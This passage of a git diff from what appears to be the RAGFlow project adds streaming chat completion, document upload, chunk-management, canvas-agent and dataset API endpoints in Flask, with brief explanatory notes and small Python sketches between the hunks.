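```

The module names currently matched by the two glob patterns may never trigger the over-trimming, but the literal-suffix form removes the dependency on how files happen to be named.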
@ -86,7 +91,7 @@ def register_page(page_path):
pages_dir = [
Path(__file__).parent,
Path(__file__).parent.parent / 'api' / 'apps',
Path(__file__).parent.parent / 'api' / 'apps', # FIXME: ragflow/api/api/apps, can be removed?
]
client_urls_prefix = [


@ -13,21 +13,25 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import os
import re
from datetime import datetime, timedelta
from flask import request
from flask import request, Response
from flask_login import login_required, current_user
from api.db import FileType, ParserType
from api.db.db_models import APIToken, API4Conversation
from api.db import FileType, ParserType, FileSource
from api.db.db_models import APIToken, API4Conversation, Task, File
from api.db.services import duplicate_name
from api.db.services.api_service import APITokenService, API4ConversationService
from api.db.services.dialog_service import DialogService, chat
from api.db.services.document_service import DocumentService
from api.db.services.file2document_service import File2DocumentService
from api.db.services.file_service import FileService
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.task_service import queue_tasks, TaskService
from api.db.services.user_service import UserTenantService
from api.settings import RetCode
from api.settings import RetCode, retrievaler
from api.utils import get_uuid, current_timestamp, datetime_format
from api.utils.api_utils import server_error_response, get_data_error_result, get_json_result, validate_request
from itsdangerous import URLSafeTimedSerializer
@ -164,6 +168,7 @@ def completion():
e, conv = API4ConversationService.get_by_id(req["conversation_id"])
if not e:
return get_data_error_result(retmsg="Conversation not found!")
if "quote" not in req: req["quote"] = False
msg = []
for m in req["messages"]:
@ -180,13 +185,60 @@ def completion():
return get_data_error_result(retmsg="Dialog not found!")
del req["conversation_id"]
del req["messages"]
ans = chat(dia, msg, **req)
if not conv.reference:
conv.reference = []
conv.reference.append(ans["reference"])
conv.message.append({"role": "assistant", "content": ans["answer"]})
API4ConversationService.append_message(conv.id, conv.to_dict())
return get_json_result(data=ans)
conv.message.append({"role": "assistant", "content": ""})
conv.reference.append({"chunks": [], "doc_aggs": []})
def fillin_conv(ans):
nonlocal conv
if not conv.reference:
conv.reference.append(ans["reference"])
else: conv.reference[-1] = ans["reference"]
conv.message[-1] = {"role": "assistant", "content": ans["answer"]}
def rename_field(ans):
reference = ans['reference']
if not isinstance(reference, dict):
return
for chunk_i in reference.get('chunks', []):
if 'docnm_kwd' in chunk_i:
chunk_i['doc_name'] = chunk_i['docnm_kwd']
chunk_i.pop('docnm_kwd')
def stream():
nonlocal dia, msg, req, conv
try:
for ans in chat(dia, msg, True, **req):
fillin_conv(ans)
rename_field(ans)
yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": ans}, ensure_ascii=False) + "\n\n"
API4ConversationService.append_message(conv.id, conv.to_dict())
except Exception as e:
yield "data:" + json.dumps({"retcode": 500, "retmsg": str(e),
"data": {"answer": "**ERROR**: "+str(e), "reference": []}},
ensure_ascii=False) + "\n\n"
yield "data:"+json.dumps({"retcode": 0, "retmsg": "", "data": True}, ensure_ascii=False) + "\n\n"
if req.get("stream", True):
resp = Response(stream(), mimetype="text/event-stream")
resp.headers.add_header("Cache-control", "no-cache")
resp.headers.add_header("Connection", "keep-alive")
resp.headers.add_header("X-Accel-Buffering", "no")
resp.headers.add_header("Content-Type", "text/event-stream; charset=utf-8")
return resp
else:
answer = None
for ans in chat(dia, msg, **req):
answer = ans
fillin_conv(ans)
API4ConversationService.append_message(conv.id, conv.to_dict())
break
rename_field(answer)
return get_json_result(data=answer)
except Exception as e:
return server_error_response(e)
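
The streaming branch of `completion()` frames every answer as a server-sent event: the literal `data:` prefix, a JSON payload, and a blank line. A minimal sketch of that framing, without Flask, follows. `sse_event` and `sse_stream` are hypothetical names introduced here, and the payload shape simply mirrors the `retcode`/`retmsg`/`data` fields seen in the diff.

```python
import json
from typing import Any, Dict, Iterable, Iterator


def sse_event(payload: Dict[str, Any]) -> str:
    """Frame one JSON payload as a server-sent event: a 'data:' field ended by a blank line."""
    return "data:" + json.dumps(payload, ensure_ascii=False) + "\n\n"


def sse_stream(answers: Iterable[Dict[str, Any]]) -> Iterator[str]:
    """Yield one event per answer, an error event on failure, then a final end marker."""
    try:
        for ans in answers:
            yield sse_event({"retcode": 0, "retmsg": "", "data": ans})
    except Exception as e:
        yield sse_event({"retcode": 500, "retmsg": str(e),
                         "data": {"answer": "**ERROR**: " + str(e), "reference": []}})
    # The closing event carries data=True so a client can tell the stream has ended.
    yield sse_event({"retcode": 0, "retmsg": "", "data": True})
```

Keeping the framing in one small function makes it easy to test the wire format separately from the chat logic.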
@ -199,7 +251,15 @@ def get(conversation_id):
if not e:
return get_data_error_result(retmsg="Conversation not found!")
return get_json_result(data=conv.to_dict())
conv = conv.to_dict()
for reference_i in conv['reference']:
if reference_i is None or len(reference_i) == 0:
continue
for chunk_i in reference_i['chunks']:
if 'docnm_kwd' in chunk_i.keys():
chunk_i['doc_name'] = chunk_i['docnm_kwd']
chunk_i.pop('docnm_kwd')
return get_json_result(data=conv)
except Exception as e:
return server_error_response(e)
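
Both `completion()` and `get()` rename the internal `docnm_kwd` key to `doc_name` before returning chunks to the caller. A minimal sketch of a shared helper for that step follows. `rename_doc_name` is a hypothetical name, and the tolerance for non-dict references is an assumption based on the `isinstance` check in `rename_field`.

```python
from typing import Any


def rename_doc_name(reference: Any) -> None:
    """Rename 'docnm_kwd' to 'doc_name' in place on every chunk of one reference entry."""
    if not isinstance(reference, dict):
        return  # tolerate None or list-shaped references
    for chunk in reference.get("chunks", []):
        if "docnm_kwd" in chunk:
            chunk["doc_name"] = chunk.pop("docnm_kwd")


if __name__ == "__main__":
    ref = {"chunks": [{"docnm_kwd": "manual.pdf", "content": "..."}], "doc_aggs": []}
    rename_doc_name(ref)
    print(ref["chunks"][0])
```

Using `dict.pop` performs the copy and the removal in one step, and `reference.get("chunks", [])` avoids a `KeyError` when an entry has no chunks.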
@ -233,6 +293,13 @@ def upload():
if file.filename == '':
return get_json_result(
data=False, retmsg='No file selected!', retcode=RetCode.ARGUMENT_ERROR)
root_folder = FileService.get_root_folder(tenant_id)
pf_id = root_folder["id"]
FileService.init_knowledgebase_docs(pf_id, tenant_id)
kb_root_folder = FileService.get_kb_folder(tenant_id)
kb_folder = FileService.new_a_file_from_kb(kb.tenant_id, kb.name, kb_root_folder["id"])
try:
if DocumentService.get_doc_count(kb.tenant_id) >= int(os.environ.get('MAX_FILE_NUM_PER_USER', 8192)):
return get_data_error_result(
@ -264,11 +331,311 @@ def upload():
"size": len(blob),
"thumbnail": thumbnail(filename, blob)
}
form_data=request.form
if "parser_id" in form_data.keys():
if request.form.get("parser_id").strip() in list(vars(ParserType).values())[1:-3]:
doc["parser_id"] = request.form.get("parser_id").strip()
if doc["type"] == FileType.VISUAL:
doc["parser_id"] = ParserType.PICTURE.value
if doc["type"] == FileType.AURAL:
doc["parser_id"] = ParserType.AUDIO.value
if re.search(r"\.(ppt|pptx|pages)$", filename):
doc["parser_id"] = ParserType.PRESENTATION.value
doc = DocumentService.insert(doc)
return get_json_result(data=doc.to_json())
doc_result = DocumentService.insert(doc)
FileService.add_file_from_kb(doc, kb_folder["id"], kb.tenant_id)
except Exception as e:
return server_error_response(e)
if "run" in form_data.keys():
if request.form.get("run").strip() == "1":
try:
info = {"run": 1, "progress": 0}
info["progress_msg"] = ""
info["chunk_num"] = 0
info["token_num"] = 0
DocumentService.update_by_id(doc["id"], info)
# if str(req["run"]) == TaskStatus.CANCEL.value:
tenant_id = DocumentService.get_tenant_id(doc["id"])
if not tenant_id:
return get_data_error_result(retmsg="Tenant not found!")
#e, doc = DocumentService.get_by_id(doc["id"])
TaskService.filter_delete([Task.doc_id == doc["id"]])
e, doc = DocumentService.get_by_id(doc["id"])
doc = doc.to_dict()
doc["tenant_id"] = tenant_id
bucket, name = File2DocumentService.get_minio_address(doc_id=doc["id"])
queue_tasks(doc, bucket, name)
except Exception as e:
return server_error_response(e)
return get_json_result(data=doc_result.to_json())
@manager.route('/list_chunks', methods=['POST'])
# @login_required
def list_chunks():
token = request.headers.get('Authorization').split()[1]
objs = APIToken.query(token=token)
if not objs:
return get_json_result(
data=False, retmsg='Token is not valid!', retcode=RetCode.AUTHENTICATION_ERROR)
req = request.json
try:
if "doc_name" in req.keys():
tenant_id = DocumentService.get_tenant_id_by_name(req['doc_name'])
doc_id = DocumentService.get_doc_id_by_doc_name(req['doc_name'])
elif "doc_id" in req.keys():
tenant_id = DocumentService.get_tenant_id(req['doc_id'])
doc_id = req['doc_id']
else:
return get_json_result(
data=False, retmsg="Can't find doc_name or doc_id"
)
res = retrievaler.chunk_list(doc_id=doc_id, tenant_id=tenant_id)
res = [
{
"content": res_item["content_with_weight"],
"doc_name": res_item["docnm_kwd"],
"img_id": res_item["img_id"]
} for res_item in res
]
except Exception as e:
return server_error_response(e)
return get_json_result(data=res)
@manager.route('/list_kb_docs', methods=['POST'])
# @login_required
def list_kb_docs():
token = request.headers.get('Authorization').split()[1]
objs = APIToken.query(token=token)
if not objs:
return get_json_result(
data=False, retmsg='Token is not valid!', retcode=RetCode.AUTHENTICATION_ERROR)
req = request.json
tenant_id = objs[0].tenant_id
kb_name = req.get("kb_name", "").strip()
try:
e, kb = KnowledgebaseService.get_by_name(kb_name, tenant_id)
if not e:
return get_data_error_result(
retmsg="Can't find this knowledgebase!")
kb_id = kb.id
except Exception as e:
return server_error_response(e)
page_number = int(req.get("page", 1))
items_per_page = int(req.get("page_size", 15))
orderby = req.get("orderby", "create_time")
desc = req.get("desc", True)
keywords = req.get("keywords", "")
try:
docs, tol = DocumentService.get_by_kb_id(
kb_id, page_number, items_per_page, orderby, desc, keywords)
docs = [{"doc_id": doc['id'], "doc_name": doc['name']} for doc in docs]
return get_json_result(data={"total": tol, "docs": docs})
except Exception as e:
return server_error_response(e)
@manager.route('/document', methods=['DELETE'])
# @login_required
def document_rm():
token = request.headers.get('Authorization').split()[1]
objs = APIToken.query(token=token)
if not objs:
return get_json_result(
data=False, retmsg='Token is not valid!', retcode=RetCode.AUTHENTICATION_ERROR)
tenant_id = objs[0].tenant_id
req = request.json
doc_ids = []
try:
doc_ids = [DocumentService.get_doc_id_by_doc_name(doc_name) for doc_name in req.get("doc_names", [])]
for doc_id in req.get("doc_ids", []):
if doc_id not in doc_ids:
doc_ids.append(doc_id)
if not doc_ids:
return get_json_result(
data=False, retmsg="Can't find doc_names or doc_ids"
)
except Exception as e:
return server_error_response(e)
root_folder = FileService.get_root_folder(tenant_id)
pf_id = root_folder["id"]
FileService.init_knowledgebase_docs(pf_id, tenant_id)
errors = ""
for doc_id in doc_ids:
try:
e, doc = DocumentService.get_by_id(doc_id)
if not e:
return get_data_error_result(retmsg="Document not found!")
tenant_id = DocumentService.get_tenant_id(doc_id)
if not tenant_id:
return get_data_error_result(retmsg="Tenant not found!")
b, n = File2DocumentService.get_minio_address(doc_id=doc_id)
if not DocumentService.remove_document(doc, tenant_id):
return get_data_error_result(
retmsg="Database error (Document removal)!")
f2d = File2DocumentService.get_by_document_id(doc_id)
FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == f2d[0].file_id])
File2DocumentService.delete_by_document_id(doc_id)
MINIO.rm(b, n)
except Exception as e:
errors += str(e)
if errors:
return get_json_result(data=False, retmsg=errors, retcode=RetCode.SERVER_ERROR)
return get_json_result(data=True)
@manager.route('/completion_aibotk', methods=['POST'])
@validate_request("Authorization", "conversation_id", "word")
def completion_faq():
import base64
req = request.json
token = req["Authorization"]
objs = APIToken.query(token=token)
if not objs:
return get_json_result(
data=False, retmsg='Token is not valid!', retcode=RetCode.AUTHENTICATION_ERROR)
e, conv = API4ConversationService.get_by_id(req["conversation_id"])
if not e:
return get_data_error_result(retmsg="Conversation not found!")
if "quote" not in req: req["quote"] = True
msg = []
msg.append({"role": "user", "content": req["word"]})
try:
conv.message.append(msg[-1])
e, dia = DialogService.get_by_id(conv.dialog_id)
if not e:
return get_data_error_result(retmsg="Dialog not found!")
del req["conversation_id"]
if not conv.reference:
conv.reference = []
conv.message.append({"role": "assistant", "content": ""})
conv.reference.append({"chunks": [], "doc_aggs": []})
def fillin_conv(ans):
nonlocal conv
if not conv.reference:
conv.reference.append(ans["reference"])
else: conv.reference[-1] = ans["reference"]
conv.message[-1] = {"role": "assistant", "content": ans["answer"]}
data_type_picture = {
"type": 3,
"url": "base64 content"
}
data = [
{
"type": 1,
"content": ""
}
]
ans = ""
for a in chat(dia, msg, stream=False, **req):
ans = a
break
data[0]["content"] += re.sub(r'##\d\$\$', '', ans["answer"])
fillin_conv(ans)
API4ConversationService.append_message(conv.id, conv.to_dict())
chunk_idxs = [int(match[2]) for match in re.findall(r'##\d\$\$', ans["answer"])]
for chunk_idx in chunk_idxs[:1]:
if ans["reference"]["chunks"][chunk_idx]["img_id"]:
try:
bkt, nm = ans["reference"]["chunks"][chunk_idx]["img_id"].split("-")
response = MINIO.get(bkt, nm)
data_type_picture["url"] = base64.b64encode(response).decode('utf-8')
data.append(data_type_picture)
break
except Exception as e:
return server_error_response(e)
response = {"code": 200, "msg": "success", "data": data}
return response
except Exception as e:
return server_error_response(e)
@manager.route('/retrieval', methods=['POST'])
@validate_request("kb_id", "question")
def retrieval():
token = request.headers.get('Authorization').split()[1]
objs = APIToken.query(token=token)
if not objs:
return get_json_result(
data=False, retmsg='Token is not valid!', retcode=RetCode.AUTHENTICATION_ERROR)
req = request.json
kb_id = req.get("kb_id")
doc_ids = req.get("doc_ids", [])
question = req.get("question")
page = int(req.get("page", 1))
size = int(req.get("size", 30))
similarity_threshold = float(req.get("similarity_threshold", 0.2))
vector_similarity_weight = float(req.get("vector_similarity_weight", 0.3))
top = int(req.get("top_k", 1024))
try:
e, kb = KnowledgebaseService.get_by_id(kb_id)
if not e:
return get_data_error_result(retmsg="Knowledgebase not found!")
embd_mdl = TenantLLMService.model_instance(
kb.tenant_id, LLMType.EMBEDDING.value, llm_name=kb.embd_id)
rerank_mdl = None
if req.get("rerank_id"):
rerank_mdl = TenantLLMService.model_instance(
kb.tenant_id, LLMType.RERANK.value, llm_name=req["rerank_id"])
if req.get("keyword", False):
chat_mdl = TenantLLMService.model_instance(kb.tenant_id, LLMType.CHAT)
question += keyword_extraction(chat_mdl, question)
ranks = retrievaler.retrieval(question, embd_mdl, kb.tenant_id, [kb_id], page, size,
similarity_threshold, vector_similarity_weight, top,
doc_ids, rerank_mdl=rerank_mdl)
for c in ranks["chunks"]:
if "vector" in c:
del c["vector"]
return get_json_result(data=ranks)
except Exception as e:
if str(e).find("not_found") > 0:
return get_json_result(data=False, retmsg='No chunk found! Please check the chunk status!',
retcode=RetCode.DATA_ERROR)
return server_error_response(e)
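
The `completion_aibotk` handler above strips citation markers of the form `##N$$` from the answer and reads the chunk index from character 2 of each match. A minimal sketch of that step in isolation follows. The helper name `split_citations` is hypothetical, and using `\d+` with a capture group (so that multi-digit indexes also match) is an assumption that goes beyond the single-digit `\d` used in the diff.

```python
import re
from typing import List, Tuple

# Hypothetical helper, not part of the diff: separates citation markers
# such as "##3$$" from the answer text.
# Assumption: \d+ is used here instead of the diff's single-digit \d.
CITATION = re.compile(r"##(\d+)\$\$")


def split_citations(answer: str) -> Tuple[str, List[int]]:
    """Return the answer without markers, plus the cited chunk indexes in order."""
    indexes = [int(m.group(1)) for m in CITATION.finditer(answer)]
    clean = CITATION.sub("", answer)
    return clean, indexes


if __name__ == "__main__":
    text, cited = split_citations("Two stores ##0$$ and one depot ##12$$.")
    print(text)
    print(cited)
```

Capturing the digits with a group avoids relying on a fixed character offset, which only holds while indexes stay below 10.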

160
api/apps/canvas_app.py Normal file

@ -0,0 +1,160 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
from functools import partial
from flask import request, Response
from flask_login import login_required, current_user
from api.db.services.canvas_service import CanvasTemplateService, UserCanvasService
from api.utils import get_uuid
from api.utils.api_utils import get_json_result, server_error_response, validate_request
from agent.canvas import Canvas
@manager.route('/templates', methods=['GET'])
@login_required
def templates():
return get_json_result(data=[c.to_dict() for c in CanvasTemplateService.get_all()])
@manager.route('/list', methods=['GET'])
@login_required
def canvas_list():
return get_json_result(data=sorted([c.to_dict() for c in \
UserCanvasService.query(user_id=current_user.id)], key=lambda x: x["update_time"]*-1)
)
@manager.route('/rm', methods=['POST'])
@validate_request("canvas_ids")
@login_required
def rm():
for i in request.json["canvas_ids"]:
UserCanvasService.delete_by_id(i)
return get_json_result(data=True)
@manager.route('/set', methods=['POST'])
@validate_request("dsl", "title")
@login_required
def save():
req = request.json
req["user_id"] = current_user.id
if not isinstance(req["dsl"], str): req["dsl"] = json.dumps(req["dsl"], ensure_ascii=False)
req["dsl"] = json.loads(req["dsl"])
if "id" not in req:
if UserCanvasService.query(user_id=current_user.id, title=req["title"].strip()):
return server_error_response(ValueError("Duplicated title."))
req["id"] = get_uuid()
if not UserCanvasService.save(**req):
return server_error_response("Fail to save canvas.")
else:
UserCanvasService.update_by_id(req["id"], req)
return get_json_result(data=req)
@manager.route('/get/<canvas_id>', methods=['GET'])
@login_required
def get(canvas_id):
e, c = UserCanvasService.get_by_id(canvas_id)
if not e:
return server_error_response("canvas not found.")
return get_json_result(data=c.to_dict())
@manager.route('/completion', methods=['POST'])
@validate_request("id")
@login_required
def run():
req = request.json
stream = req.get("stream", True)
e, cvs = UserCanvasService.get_by_id(req["id"])
if not e:
return server_error_response("canvas not found.")
if not isinstance(cvs.dsl, str):
cvs.dsl = json.dumps(cvs.dsl, ensure_ascii=False)
final_ans = {"reference": [], "content": ""}
try:
canvas = Canvas(cvs.dsl, current_user.id)
if "message" in req:
canvas.messages.append({"role": "user", "content": req["message"]})
canvas.add_user_input(req["message"])
answer = canvas.run(stream=stream)
print(canvas)
except Exception as e:
return server_error_response(e)
assert answer is not None, "Nothing. Is it over?"
if stream:
assert isinstance(answer, partial), "Nothing. Is it over?"
def sse():
nonlocal answer, cvs
try:
for ans in answer():
for k in ans.keys():
final_ans[k] = ans[k]
ans = {"answer": ans["content"], "reference": ans.get("reference", [])}
yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": ans}, ensure_ascii=False) + "\n\n"
canvas.messages.append({"role": "assistant", "content": final_ans["content"]})
if final_ans.get("reference"):
canvas.reference.append(final_ans["reference"])
cvs.dsl = json.loads(str(canvas))
UserCanvasService.update_by_id(req["id"], cvs.to_dict())
except Exception as e:
yield "data:" + json.dumps({"retcode": 500, "retmsg": str(e),
"data": {"answer": "**ERROR**: " + str(e), "reference": []}},
ensure_ascii=False) + "\n\n"
yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": True}, ensure_ascii=False) + "\n\n"
resp = Response(sse(), mimetype="text/event-stream")
resp.headers.add_header("Cache-control", "no-cache")
resp.headers.add_header("Connection", "keep-alive")
resp.headers.add_header("X-Accel-Buffering", "no")
resp.headers.add_header("Content-Type", "text/event-stream; charset=utf-8")
return resp
final_ans["content"] = "\n".join(answer["content"]) if "content" in answer else ""
canvas.messages.append({"role": "assistant", "content": final_ans["content"]})
if final_ans.get("reference"):
canvas.reference.append(final_ans["reference"])
cvs.dsl = json.loads(str(canvas))
UserCanvasService.update_by_id(req["id"], cvs.to_dict())
return get_json_result(data={"answer": final_ans["content"], "reference": final_ans.get("reference", [])})
@manager.route('/reset', methods=['POST'])
@validate_request("id")
@login_required
def reset():
req = request.json
try:
e, user_canvas = UserCanvasService.get_by_id(req["id"])
if not e:
return server_error_response("canvas not found.")
canvas = Canvas(json.dumps(user_canvas.dsl), current_user.id)
canvas.reset()
req["dsl"] = json.loads(str(canvas))
UserCanvasService.update_by_id(req["id"], {"dsl": req["dsl"]})
return get_json_result(data=req["dsl"])
except Exception as e:
return server_error_response(e)
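
The streaming handlers above emit each chunk as `data:` followed by a JSON object and a blank line, and finish with a frame whose `data` field is `True`. Below is a minimal client-side sketch for decoding such a body, assuming the whole stream has already been read into a string and that each frame carries the answer so far (as the overwrite in `fillin_conv` suggests). The names `parse_sse` and `collect_answer` are illustrative and not part of the codebase.

```python
import json
from typing import Any, Dict, List


def parse_sse(body: str) -> List[Dict[str, Any]]:
    """Decode frames of the form 'data:{json}' separated by blank lines."""
    frames = []
    for block in body.split("\n\n"):
        block = block.strip()
        if not block.startswith("data:"):
            continue  # skip the empty trailing piece and any non-data block
        frames.append(json.loads(block[len("data:"):]))
    return frames


def collect_answer(frames: List[Dict[str, Any]]) -> str:
    """Return the last streamed answer; the terminal frame has data == True."""
    answer = ""
    for frame in frames:
        data = frame.get("data")
        if isinstance(data, dict):
            answer = data.get("answer", answer)
    return answer
```

Splitting on blank lines is safe for this payload because `json.dumps` escapes newlines inside strings, so a frame never contains a raw blank line.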

View File

@ -14,13 +14,15 @@
# limitations under the License.
#
import datetime
import json
import traceback
from flask import request
from flask_login import login_required, current_user
from elasticsearch_dsl import Q
from rag.app.qa import rmPrefix, beAdoc
from rag.nlp import search, rag_tokenizer
from rag.nlp import search, rag_tokenizer, keyword_extraction
from rag.utils.es_conn import ELASTICSEARCH
from rag.utils import rmSpace
from api.db import LLMType, ParserType
@ -29,7 +31,7 @@ from api.db.services.llm_service import TenantLLMService
from api.db.services.user_service import UserTenantService
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
from api.db.services.document_service import DocumentService
from api.settings import RetCode, retrievaler
from api.settings import RetCode, retrievaler, kg_retrievaler
from api.utils.api_utils import get_json_result
import hashlib
import re
@ -38,7 +40,7 @@ import re
@manager.route('/list', methods=['POST'])
@login_required
@validate_request("doc_id")
def list():
def list_chunk():
req = request.json
doc_id = req["doc_id"]
page = int(req.get("page", 1))
@ -61,7 +63,8 @@ def list():
for id in sres.ids:
d = {
"chunk_id": id,
"content_with_weight": rmSpace(sres.highlight[id]) if question and id in sres.highlight else sres.field[id].get(
"content_with_weight": rmSpace(sres.highlight[id]) if question and id in sres.highlight else sres.field[
id].get(
"content_with_weight", ""),
"doc_id": sres.field[id]["doc_id"],
"docnm_kwd": sres.field[id]["docnm_kwd"],
@ -136,8 +139,11 @@ def set():
tenant_id = DocumentService.get_tenant_id(req["doc_id"])
if not tenant_id:
return get_data_error_result(retmsg="Tenant not found!")
embd_id = DocumentService.get_embd_id(req["doc_id"])
embd_mdl = TenantLLMService.model_instance(
tenant_id, LLMType.EMBEDDING.value)
tenant_id, LLMType.EMBEDDING.value, embd_id)
e, doc = DocumentService.get_by_id(req["doc_id"])
if not e:
return get_data_error_result(retmsg="Document not found!")
@ -150,7 +156,7 @@ def set():
if len(arr) != 2:
return get_data_error_result(
retmsg="Q&A must be separated by TAB/ENTER key.")
q, a = rmPrefix(arr[0]), rmPrefix[arr[1]]
q, a = rmPrefix(arr[0]), rmPrefix(arr[1])
d = beAdoc(d, arr[0], arr[1], not any(
[rag_tokenizer.is_chinese(t) for t in q + a]))
@ -182,13 +188,19 @@ def switch():
@manager.route('/rm', methods=['POST'])
@login_required
@validate_request("chunk_ids")
@validate_request("chunk_ids", "doc_id")
def rm():
req = request.json
try:
if not ELASTICSEARCH.deleteByQuery(
Q("ids", values=req["chunk_ids"]), search.index_name(current_user.id)):
return get_data_error_result(retmsg="Index updating failure")
e, doc = DocumentService.get_by_id(req["doc_id"])
if not e:
return get_data_error_result(retmsg="Document not found!")
deleted_chunk_ids = req["chunk_ids"]
chunk_number = len(deleted_chunk_ids)
DocumentService.decrement_chunk_num(doc.id, doc.kb_id, 1, chunk_number, 0)
return get_json_result(data=True)
except Exception as e:
return server_error_response(e)
@ -222,13 +234,17 @@ def create():
if not tenant_id:
return get_data_error_result(retmsg="Tenant not found!")
embd_id = DocumentService.get_embd_id(req["doc_id"])
embd_mdl = TenantLLMService.model_instance(
tenant_id, LLMType.EMBEDDING.value)
tenant_id, LLMType.EMBEDDING.value, embd_id)
v, c = embd_mdl.encode([doc.name, req["content_with_weight"]])
DocumentService.increment_chunk_num(req["doc_id"], doc.kb_id, c, 1, 0)
v = 0.1 * v[0] + 0.9 * v[1]
d["q_%d_vec" % len(v)] = v.tolist()
ELASTICSEARCH.upsert([d], search.index_name(tenant_id))
DocumentService.increment_chunk_num(
doc.id, doc.kb_id, c, 1, 0)
return get_json_result(data={"chunk_id": chunck_id})
except Exception as e:
return server_error_response(e)
@ -254,8 +270,20 @@ def retrieval_test():
embd_mdl = TenantLLMService.model_instance(
kb.tenant_id, LLMType.EMBEDDING.value, llm_name=kb.embd_id)
ranks = retrievaler.retrieval(question, embd_mdl, kb.tenant_id, [kb_id], page, size, similarity_threshold,
vector_similarity_weight, top, doc_ids)
rerank_mdl = None
if req.get("rerank_id"):
rerank_mdl = TenantLLMService.model_instance(
kb.tenant_id, LLMType.RERANK.value, llm_name=req["rerank_id"])
if req.get("keyword", False):
chat_mdl = TenantLLMService.model_instance(kb.tenant_id, LLMType.CHAT)
question += keyword_extraction(chat_mdl, question)
retr = retrievaler if kb.parser_id != ParserType.KG else kg_retrievaler
ranks = retr.retrieval(question, embd_mdl, kb.tenant_id, [kb_id], page, size,
similarity_threshold, vector_similarity_weight, top,
doc_ids, rerank_mdl=rerank_mdl)
for c in ranks["chunks"]:
if "vector" in c:
del c["vector"]
@ -266,3 +294,25 @@ def retrieval_test():
return get_json_result(data=False, retmsg='No chunk found! Please check the chunk status!',
retcode=RetCode.DATA_ERROR)
return server_error_response(e)
@manager.route('/knowledge_graph', methods=['GET'])
@login_required
def knowledge_graph():
doc_id = request.args["doc_id"]
req = {
"doc_ids":[doc_id],
"knowledge_graph_kwd": ["graph", "mind_map"]
}
tenant_id = DocumentService.get_tenant_id(doc_id)
sres = retrievaler.search(req, search.index_name(tenant_id))
obj = {"graph": {}, "mind_map": {}}
for id in sres.ids[:2]:
ty = sres.field[id]["knowledge_graph_kwd"]
try:
obj[ty] = json.loads(sres.field[id]["content_with_weight"])
except Exception as e:
print(traceback.format_exc(), flush=True)
return get_json_result(data=obj)

View File

@ -13,12 +13,14 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
from flask import request
from copy import deepcopy
from flask import request, Response
from flask_login import login_required
from api.db.services.dialog_service import DialogService, ConversationService, chat
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
from api.utils import get_uuid
from api.utils.api_utils import get_json_result
import json
@manager.route('/set', methods=['POST'])
@ -103,9 +105,12 @@ def list_convsersation():
@manager.route('/completion', methods=['POST'])
@login_required
@validate_request("conversation_id", "messages")
#@validate_request("conversation_id", "messages")
def completion():
req = request.json
#req = {"conversation_id": "9aaaca4c11d311efa461fa163e197198", "messages": [
# {"role": "user", "content": "Is there one in Shanghai?"}
#]}
msg = []
for m in req["messages"]:
if m["role"] == "system":
@ -117,19 +122,54 @@ def completion():
e, conv = ConversationService.get_by_id(req["conversation_id"])
if not e:
return get_data_error_result(retmsg="Conversation not found!")
conv.message.append(msg[-1])
conv.message.append(deepcopy(msg[-1]))
e, dia = DialogService.get_by_id(conv.dialog_id)
if not e:
return get_data_error_result(retmsg="Dialog not found!")
del req["conversation_id"]
del req["messages"]
ans = chat(dia, msg, **req)
if not conv.reference:
conv.reference = []
conv.reference.append(ans["reference"])
conv.message.append({"role": "assistant", "content": ans["answer"]})
ConversationService.update_by_id(conv.id, conv.to_dict())
return get_json_result(data=ans)
conv.message.append({"role": "assistant", "content": ""})
conv.reference.append({"chunks": [], "doc_aggs": []})
def fillin_conv(ans):
nonlocal conv
if not conv.reference:
conv.reference.append(ans["reference"])
else: conv.reference[-1] = ans["reference"]
conv.message[-1] = {"role": "assistant", "content": ans["answer"]}
def stream():
nonlocal dia, msg, req, conv
try:
for ans in chat(dia, msg, True, **req):
fillin_conv(ans)
yield "data:"+json.dumps({"retcode": 0, "retmsg": "", "data": ans}, ensure_ascii=False) + "\n\n"
ConversationService.update_by_id(conv.id, conv.to_dict())
except Exception as e:
yield "data:" + json.dumps({"retcode": 500, "retmsg": str(e),
"data": {"answer": "**ERROR**: "+str(e), "reference": []}},
ensure_ascii=False) + "\n\n"
yield "data:"+json.dumps({"retcode": 0, "retmsg": "", "data": True}, ensure_ascii=False) + "\n\n"
if req.get("stream", True):
resp = Response(stream(), mimetype="text/event-stream")
resp.headers.add_header("Cache-control", "no-cache")
resp.headers.add_header("Connection", "keep-alive")
resp.headers.add_header("X-Accel-Buffering", "no")
resp.headers.add_header("Content-Type", "text/event-stream; charset=utf-8")
return resp
else:
answer = None
for ans in chat(dia, msg, **req):
answer = ans
fillin_conv(ans)
ConversationService.update_by_id(conv.id, conv.to_dict())
break
return get_json_result(data=answer)
except Exception as e:
return server_error_response(e)

876
api/apps/dataset_api.py Normal file

@ -0,0 +1,876 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pathlib
import re
import warnings
from functools import partial
from io import BytesIO
from elasticsearch_dsl import Q
from flask import request, send_file
from flask_login import login_required, current_user
from httpx import HTTPError
from api.contants import NAME_LENGTH_LIMIT
from api.db import FileType, ParserType, FileSource, TaskStatus
from api.db import StatusEnum
from api.db.db_models import File
from api.db.services import duplicate_name
from api.db.services.document_service import DocumentService
from api.db.services.file2document_service import File2DocumentService
from api.db.services.file_service import FileService
